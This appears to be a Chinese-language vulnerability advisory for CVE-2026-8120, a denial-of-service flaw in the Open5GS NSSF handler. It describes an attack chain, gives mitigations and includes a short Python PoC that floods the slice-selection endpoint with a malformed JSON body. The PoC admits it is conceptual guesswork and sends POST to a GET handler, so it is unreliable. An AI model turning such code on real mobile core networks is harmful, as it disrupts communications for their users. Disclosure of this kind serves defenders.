CVE-2026-8120 Open5GS拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-8120

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

Open5GS版本2.7.7及以下存在安全漏洞。该漏洞位于NSSF组件的nnssf-handler.c文件中的nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf函数。攻击者可远程利用该漏洞发送恶意数据包，导致系统处理异常引发拒绝服务。目前利用代码已公开，厂商尚未发布修复补丁，风险较高。

技术细节

该漏洞源于Open5GS项目NSSF（网络切片选择功能）组件在处理特定网络消息时的逻辑缺陷。具体受影响的代码位于/src/nssf/nnssf-handler.c文件中的nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf函数。由于该函数缺乏对特定参数的严格校验，攻击者可以通过网络向目标Open5GS服务器发送构造异常的HTTP或协议数据包。利用该漏洞无需复杂权限，仅需低级别权限即可发起攻击，且不需要受害者用户交互。一旦攻击成功，将导致NSSF服务进程异常终止或陷入死循环，从而引发拒绝服务，破坏核心网的网络切片选择功能，导致通信中断。

攻击链分析

STEP 1

1. 侦察

攻击者识别网络上开放的Open5GS NSSF服务接口及其API端点。

STEP 2

2. 武器化

攻击者构造特制的恶意数据包，包含能够触发nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf函数异常的参数或数据结构。

STEP 3

3. 传递

攻击者通过网络向受害者的NSSF组件端口发送该恶意数据包。

STEP 4

4. 利用

目标服务器解析数据包并调用受影响函数，由于缺乏校验导致处理逻辑错误（如空指针引用或内存越界）。

STEP 5

5. 影响

Open5GS的NSSF服务进程崩溃或挂起，导致网络切片选择功能不可用，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# This is a conceptual PoC based on the vulnerability description.
# The vulnerability affects the nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf function.
# Sending a malformed request to the NSSF endpoint triggers the DoS.

def exploit(target_url):
    headers = {
        "User-Agent": "CVE-2026-8120-Test",
        "Content-Type": "application/json"
    }
    # Malformed payload intended to trigger the flaw in the handler
    payload = {
        "invalid-param": None, 
        "nested": {
            "overflow": "A" * 10000
        }
    }
    
    try:
        print(f"[+] Sending payload to {target_url}")
        response = requests.post(target_url, json=payload, headers=headers, timeout=5)
        print(f"[+] Response Code: {response.status_code}")
        print("[+] Check if the service crashed.")
    except Exception as e:
        print(f"[-] Request failed or service went down: {e}")

if __name__ == "__main__":
    # Replace with actual target NSSF endpoint
    target = "http://target-open5gs-nssf:8000/nnssf-nsselection/v1"
    exploit(target)

影响范围

Open5GS <= 2.7.7

防御指南

临时缓解措施

由于厂商尚未发布修复补丁，建议通过网络防火墙限制对Open5GS NSSF组件端口的访问，仅允许受信任的AMF或VNSSF节点连接。同时，部署入侵检测系统（IDS）监控针对NSSF接口的异常流量模式，以便及时发现并阻断攻击尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8120
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8120
3 Details https://www.cvedetails.com/cve/CVE-2026-8120/
4 VulDB https://vuldb.com/cve/CVE-2026-8120
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/issues/4432
7 Link https://vuldb.com/submit/808421
8 Link https://vuldb.com/vuln/361907
9 Link https://vuldb.com/vuln/361907/cti
10 Link https://vuldb.com/submit/808421